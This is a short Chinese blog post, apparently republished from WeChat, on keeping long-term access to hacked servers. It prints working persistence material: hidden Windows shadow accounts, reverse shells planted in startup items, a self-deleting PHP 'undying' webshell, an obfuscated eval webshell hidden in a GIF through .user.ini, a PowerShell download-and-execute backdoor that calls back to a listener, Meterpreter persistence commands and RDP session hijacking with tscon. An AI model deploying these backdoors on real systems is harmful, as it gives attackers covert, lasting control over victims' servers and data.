本文来源于微信公众号: 洛米唯熊
0x00:简介
何为“后渗透”?就是获取到受害者服务器的权限后,再继续对受害者服务器进行长期攻击或者信息获取的一种持续性手段。常见的手段有,后门、影子账户、会话劫持等等。
0x01:实验
一、影子账户
net user luomiweixiong$ 123456 /addnet user
需要改动一下注册表,详细可以百度一下
二、shift后门
三、反弹加入自启(鸡肋)
1、NC反弹
2、Bash反弹
3、perl反弹
4、Python反弹
5、PHP反弹
6、等等
将反弹的脚本写入到启动项里,当受害者启动服务器时,自动反弹shell。弊端就是要一直监听,还要有公网的IP。
四、隐藏后门文件
1、将木马文件属性改为“隐藏”
2、将木马名字进行伪装处理,伪装成系统文件或者报错文件。修改时间跟系统文件时间类似。
3、利用循环不死马(举栗子)
<?phpset_time_limit(0);ignore_user_abort(1);unlink(__FILE__);while(1){file_put_contents('phpinf0.php','<?php $a=array($_REQUEST["kk"]=>"3");$b=array_keys($a)[0];eval($b);?>');sleep(8);}?>
auto_prepend_file=luomiweixiong.gif<!–?php $a = “a”.”s”.”s”.”e”.”r”.”t”;$a($_POST[“kk”]); ?–>1、PHP的正常文件
2、修改后.user.ini文件
3、luomiweixiong.gif木马
powershell.exe-exec bypass -c "IEX (New-ObjectNet.WebClient).DownloadString('http://192.168.124.25/Invoke-taskBackdoor.ps1');Invoke-Tasksbackdoor-method nccat -ip 192.168.124.14 -port 666 -time 2"run persistence -U -i 12 -p 6666 -r 192.168.124.14run metsvc -Aquery usersc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#4"net start sesshijack
0x02:题外话
以上这些只是思路。未必能成。
维护权限还有很多种方法,我这里只是举几个栗子🌰。
学生不才,总结不精,望良师指导
文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650456535&idx=1&sn=24fa228017983008b7dd8a3f79a262ba&chksm=83bba433b4cc2d25fae645e88d79b660aa47b2b6aca06919a72fc01591849ca3a94f6e959aaf#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh